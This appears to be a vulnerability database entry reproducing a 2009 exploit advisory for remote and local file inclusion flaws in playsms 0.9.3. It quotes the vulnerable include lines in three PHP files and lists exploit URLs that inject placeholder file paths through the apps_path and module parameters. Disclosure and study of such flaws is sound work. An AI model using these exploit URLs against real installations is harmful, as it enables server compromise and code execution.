RFI/LFI

vendor:

playsms

by:

ahmadbady

7.5

CVSS

HIGH

Remote File Inclusion/Local File Inclusion

CWE

Product Name: playsms

Affected Version From: playsms 0.9.3

Affected Version To: playsms 0.9.3

Patch Exists: YES

Related CWE: N/A

CPE: a:playsms:playsms:0.9.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

playsms 0.9.3 is vulnerable to Remote File Inclusion/Local File Inclusion. The vulnerability is due to the application including files without proper sanitization of user supplied input. This can be exploited to include arbitrary files from remote and local resources by manipulating the 'apps_path[plug]', 'gateway_module', 'apps_path[themes]', 'themes_module' and 'apps_path[libs]' parameters in the 'plugin/gateway/gnokii/init.php', 'plugin/themes/default/init.php' and 'lib/function.php' scripts.

Mitigation:

Input validation should be used to prevent Remote File Inclusion/Local File Inclusion attacks.

Source

Exploit-DB raw data:

                                                              ==:RFI/LFI:==


=====================
script:playsms 0.9.3

==========================================================================
download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0
   
==========================================================================
vul1: /plugin/gateway/gnokii/init.php lin 2 , 3;

2 include "$apps_path[plug]/gateway/$gateway_module/config.php";
3 include "$apps_path[plug]/gateway/$gateway_module/fn.php";

==========================================================================
vul2: /plugin/themes/default/init.php lin 2 , 3;

2 include $apps_path[themes]."/".$themes_module."/config.php";
3 include $apps_path[themes]."/".$themes_module."/fn.php";

==========================================================================
vul3: /lib/function.php lin 4 and...

lin4 include "$apps_path[libs]/fn_auth.php";

==========================================================================

xpl:
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]?
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi]

http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]?
http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi]

http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]?
==========================================================================
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-01-06]